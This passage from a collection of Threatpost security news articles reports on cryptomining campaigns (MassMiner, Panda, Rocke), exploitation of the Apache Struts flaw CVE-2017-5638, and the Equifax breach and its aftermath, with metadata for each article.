\u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. 
Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. 
So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. 
\u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. 
“Their infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don’t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.”

Between swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining – and moving forward, Panda remains an active threat that system administrators should be wary of.

“There are several ways to detect mining activity but let’s focus on the simple solutions of patching and basic security controls,” Evans told Threatpost. “If you’re running a web-accessible WebLogic server that hasn’t been patched against vulnerabilities like CVE-2017-10271, it’s likely they have at least targeted the system for exploitation if not actually dropped a miner on it… In addition, if you don’t need it open to the Internet, take it off.”

", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.

The vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.

“The second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it’s a ramp-up for rapid exploitation by a large number of people,” said Craig Williams, senior technical leader for Cisco’s Talos research outfit. “We’re basically seeing a huge number of people continue to exploit the vulnerability. That’s likely going to continue to increase. I think what we’re also going to see is people going to try to scan for the vulnerability.”

The flaw lives in the Jakarta Multipart parser upload function in Apache Struts.
It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).

Talk of the vulnerability surfaced on Chinese forums, according to Vicente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity with which an attacker could inject operating system commands.

The attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it’s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.

“[Attacks] look like requests to a webserver with a malformed piece,” Williams said. “Unless you’re looking for it, it’s easy not to see the malformed content type.”

An attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.

“Unfortunately, due to the nature of command-line injections like this, it’s very easy to modify,” Williams said. “And that’s why I think we’re going to continue to see exploitation rise for the foreseeable future.”

The risks are severe for an organization running an exposed Apache server if it’s compromised.

“The sky’s the limit,” Williams said. “If I’m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I’m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.”

Williams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the BillGates botnet.

Williams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.

“I’m going to guess there’s a reasonable number of devices running it, and due to the nature of IoT, those aren’t going to be patched any time soon. So this is going to be an issue for the foreseeable future.”

Given the availability of patches and detection rules, it’s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.

“Due to the fact that it’s relatively easy to go inside and modify an attack, it’s going to be bad and it’s going to plague us for some time,” Williams said. “Good news is that detecting it is not that difficult.”

", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "

Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.

The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.

The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis” it found that these newly identified victims’ names and partial driver’s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.

Attackers were also unable to reach additional license details for this latest slew of impacted victims – including the state where their licenses were issued and the expiration dates.

“This is not about newly discovered stolen data,” Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement.
“It’s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.”

Equifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver’s license information.

“The methodology used in the company’s forensic examination of last year’s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,” said the company in a statement. “This was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.”

Equifax said it will notify the newly identified consumers directly by U.S. Postal mail, “and will offer identity theft protection and credit file monitoring services at no cost to them,” said the company.

The company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.

**Ongoing Breach Disclosures**

Equifax has been under public scrutiny since September, when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed “U.S. website application vulnerability to gain access to certain files” from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like Social Security numbers, birth dates, and license numbers.

Later, during Equifax’s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the “applicable personnel responsible” to patch the vulnerability, it was never fixed.

“It appears that the breach occurred because of both human error and technology failures,” Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.

Making the breach worse was Equifax’s further botched response to the breach.

After the breach was revealed in September, the company’s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner’s Flash Player download.

The extent and scope of the breach also has been continually expanding since it was first disclosed in September.
In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.

Meanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayer identification numbers, email addresses, and credit card expiration dates for certain customers.

**Renewed Anger**

This latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection – such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.

> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened.
>
> We also need to change the law.
>
> — Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)

> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>
>
> — Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)

Equifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.

Customers can see if their personal information has been breached by clicking on an “Am I Impacted” tool on Equifax’s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.

The company handles data on more than 820 million customers and 91 million businesses worldwide.

", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "

Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.

The consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB).
If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.

“Companies that profit from personal information have an extra responsibility to protect and secure that data,” said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). “Equifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.”

Equifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver’s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company’s files for nearly 12 weeks.

After the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.

Lawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.

As part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys’ fees and costs in the multi-district litigation.

In the past month, a slew of fines and penalties have been imposed that were tied to privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident.
Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).

While opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.

“I’m far from an Equifax apologist, but the truth is it could have been anyone,” Adam Laub, chief marketing officer at STEALTHbits Technologies, said in an email. “It’s not an excuse, but rather the reality we live in. The best outcome isn’t Equifax making the situation right – although that is important for all of those affected – it’s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it’s got to be from the ground up too. There’s no silver bullet.”

", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "

Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.

Researchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.

Cisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.

Rapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up, peaking at fewer than 50 between 11 a.m. and 6 p.m.
Wednesday.

“We are really seeing limited attempts to exploit the vulnerability,” said Tom Sellers, threat analyst and security researcher at Rapid7. “For context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.”

Craig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.

“Early indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,” Williams said. “Because this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.”

The vulnerability is in the Jakarta Multipart parser that comes with Apache Struts. An attacker can trivially exploit the vulnerability to gain remote code execution by sending an HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.

“When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,” Sellers wrote in an analysis published yesterday.

The vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.

The second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.

“While we’ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,” Sellers said. “We’ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.”

Sellers said it’s unclear as to why there’s been a dropoff in malicious traffic.

“It could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,” Sellers said. “Attackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.”

Cisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.

“Given the low sample size it’s difficult for me to say. It’s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,” Sellers said. “Compare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.”

Researchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root—an uncommon practice—are most at risk.

", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.

Paulino do Rego Barros, Jr., the company’s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.

Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn’t find any additional vulnerabilities. The extra 2.5 million Americans figure came “during Mandiant’s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.”

The company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought.
The company said several weeks ago that up to 100,000 Canadians may have been affected; however, upon closer inspection, only 8,000 Canadian consumers were affected by the breach.

Equifax says it’s still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle of discussions with regulators to determine how to notify them.

Details about the breach came out the day before Richard Smith, Equifax’s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in the wake of the breach.

In a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of “human error and technology failures.”

“These mistakes – made in the same chain of security systems designed with redundancies – allowed criminals to access over 140 million Americans’ data,” Smith wrote.

In the testimony Smith claimed that the U.S. Department of Homeland Security’s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.

Equifax requested the “applicable personnel responsible” update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.

That was never done and according to Smith, the vulnerability wasn’t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax’s systems on May 13 – and persisted until the company became aware of the attackers on July 30.

Greg Walden (R-Ore.) pointed out some of Equifax’s many missteps on Tuesday morning, including how Equifax’s consumer facing website for the breach was hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.

“On top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,” Walden said. “Talk about ham-handed responses, this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.”

During another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania’s 18th Congressional district, came back to that question. When told the company’s original site couldn’t handle the traffic it received, Murphy was befuddled.

“Why wouldn’t your website be able to handle this kind of traffic?” Murphy asked. “It just doesn’t make sense, a company your size and with your knowledge, doesn’t understand how to handle traffic for over 100 million people, don’t you use an Elastic cloud computing service that would’ve accounted for this?”

Smith said the sheer amount of traffic Equifax’s site received in the wake of the breach made hosting a site on its domain impossible.

“The environment the micro site is in is a cloud environment that’s very, very scalable,” Smith said. “Our traditional environment could not handle 400 million consumer visits for three weeks.”

Murphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it’s possible Equifax’s internal scanning system could potentially miss another vulnerability.

“If the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?” Murphy asked.

Smith skirted the question and instead discussed the difficulties associated with patching.

“Patching can take a variety of time… it can take days or up to a week or more,” Smith said, adding that he wasn’t aware of the particular Struts vulnerability at the time.

At the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California’s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.

“I want to know when they did it, when they took care of [the patch],” Eshoo said.

“They took care of it in July because we never found it,” Smith said.
\u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived from the group\u2019s Monero wallet, which includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. 
\u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. 
